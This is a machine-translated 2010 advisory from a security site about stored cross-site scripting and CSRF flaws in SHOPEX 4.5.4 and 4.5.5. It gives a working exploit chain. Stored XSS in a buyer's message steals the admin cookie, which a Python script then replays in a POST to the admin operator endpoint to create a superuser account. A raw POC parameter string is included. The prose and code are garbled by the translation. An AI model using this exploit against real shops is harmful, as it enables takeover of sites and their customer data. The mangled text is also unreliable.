SHOPEX Cross Station and CSRF vulnerabilities-vulnerability warning-the black bar safety net

ID MYHACK58:62201027701
Type myhack58
Reporter 佚名
Modified 2010-07-27T00:00:00


Cross-site request forgery(cross-site request forgery)is usually abbreviated as CSRF/XSRF, the literal translation for cross-site request forgery, i.e. an attacker by invoking third-party web site the malicious script or use the program to forge a request, of course, not need to the user end disguise any deceptive content, the user's knowledge when the attacker directly utilizing the user's browser to attack the application submit a have been predicted well the request parameters of the operation of the data package, the use of the substance is to hijack the user's session state, forced to submit an attacker is configured with the“operational behavior”of the data packet. As can be seen, the most critical is to hijack a user's session state, so to say, causing the XSRF vulnerability is the main reason for the session state to maintain not only the temporal characteristics of identity, that is to say in the use of HTTPCookie to transmit the session token of the process, should be more cautious determine the current user, rather than simply through the operation of the data package value of the Cookie to identify, simple to say is every time when the data exchange for the submission of data packages to implement unique identification. WithXSSattack compared to XSRF attacks are often not popular, and therefore its prevention resources are quite scarce and difficult to prevent, so the ratio is considered toXSSis more dangerous. The exploit: the 1. Front Desk registered users to buy goods after the message, in the background the administrator to view can occur across the station 2. To obtain an administrator COOKIE information, with the background of the CSRF vulnerability to add an admin account 3. Get the COOKIE after the use of the PY script, see attachment 4. The use of akt. py script to automatically add the management account of Beijing password Beijing to get the site background administrator permissions. Test the demo: Figure 1


Figure 2


Figure 3


Figure 4

! This will get the admin COOKIE information. the csrf portion of the CAN with a Firefox plugin to POST the following POC code: “op_id=&username=qing&userpass=qing&userpass_comfirm=amxking&super=1&status=1&name=&op_no=&department=&__a=1&memo=” This section is to add the administrator of the code, due to CSRF vulnerability, as long as we have the COOKIE can be added.


-- coding: cp936 --

import sys, httplib

params = "op_id=&username=qing&userpass=qing&userpass_comfirm=qing&super=1&status=1&name=&op_no=&department=&__a=1&memo=" headers = { "Accept": "text/javascript, text/html, application/xml, text/xml, /", "Referer": "", "Accept-Language": "zh-cn", "Content-Type": "application/x-www-form-urlencoded; charset=utf-8", "Accept-Encoding": "gzip, deflate", "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; . NET CLR 2.0.50727)", "Host": "", "Connection": "Keep-Alive", "Cache-Control": "no-cache",

XSSto get to the administrator COOKIE information######

"Cookie": "SHOPEX_LOGIN_NAME=admin; SHOPEX_SID=e03e24ecc891260e6a281268eab26826" } con2 = httplib. HTTPConnection("") con2. request("POST", "/shopadmin/index. php? ctl=admin/operator&act=save&_ajax=true&_h=3 1 5&_w=8 5 3&_wg=setting", params, headers) r2 = con2. getresponse() if r2. status == 2 0 0: print "Success", "\n" else: print "Failed", "\n" con2. close()

Author: Amxking &pluto vulnerability program: SHOPEX Vulnerability type: cross site&CSRF Affected versions: 4.5. 4 and 4. 5. 5 Release Time“2 0 1 0 year 7 month 1 8 day Testing platform: Firefox browser plugin for winxp sp3